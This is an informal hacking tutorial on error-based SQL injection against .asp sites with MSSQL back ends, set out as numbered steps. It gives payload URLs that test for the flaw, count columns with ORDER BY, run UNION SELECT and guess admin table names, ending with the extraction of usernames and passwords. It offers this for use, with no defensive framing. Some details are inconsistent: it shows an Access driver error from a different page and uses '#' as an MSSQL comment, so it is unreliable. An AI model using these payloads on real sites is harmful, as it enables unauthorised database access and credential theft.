THE BASIC ERROR-BASED MSSQL Injection

1. Vulnerable and is on .asp
2. So assume that u got a site with the name of
3. Code:
4.  
5. http://www.target.com/
6. now find page where the site is vul to sql injection…
7. You can check the Vulnerability by adding single quotation ‘
8. at the end of URL like
9. Code:
10.  
11. http://www.target.com/product.asp?id=13'
12.  
13.  
14. If u get this error…
15.  
16. Code:
17.  
18. Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
19. [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘department_id=1024’’.
20. /deptdet.asp, line 122
21. Then this means the site is vuln to sql injections…
22. Now we are going to find the columns in it…
23. Normally we use — at the end of string but in this case we will be using #
24. Code:
25.  
26. http://www.target.com/product.asp?id=13 order by 1#
27. Suppose that the site has 10 columns…when you will use the query “order by 1#” (without double quotations)
28. You will not get any error…the page will load normally…but when you will use the query “order by 11#” (without double quotations) you will get an error this means that the site has 10 columns…
29. So we will have an error on this query
30. Code:
31.  
32. http://www.target.com/product.asp?id=13 order by 11#
33. But when we will use this query, we will not get any error.
34. Code:
35.  
36. http://www.target.com/product.asp?id=13 order by 10#
37. This tells us that the table has 10 columns.
38. If this is not working use string:
39. Code:
40.  
41. http://www.target.com/product.asp?' and 1=2 ORDER BY 10--
42. or
43.  
44. http://www.target.com/product.asp?' and 1=2 ORDER BY 10#
45. This should work :),
46. Now we will write the query as…
47. Code:
48.  
49. http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
50. So now in next step we need name of a table to get number of targets visible column from all ..
51. let me explain bit , like in simple sql injection we use
52. Code:
53.  
54. union select 1,2,3,4,5,6 --
55. and we get a number to get information from site , in this we need a table name to get that number of visible column ,
56. so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10
57. in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are ” admin,tbladmin,tbl_admin,user,users,login,info,email” etc . Suppose in the site we got admin table that is visible. Now our url will look like
58. Code:
59.  
60. http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#
61. After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible…
62. So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,
63. Now our URL will look like
64. Code:
65.  
66. http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
67. Suppose we got a username instead of the number 3.
68. and then change column name with passwords column name
69. you will get the password ;)
70. URL will be like
71. Code:
72.  
73. http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
74. Do manual SQLi and you will be the best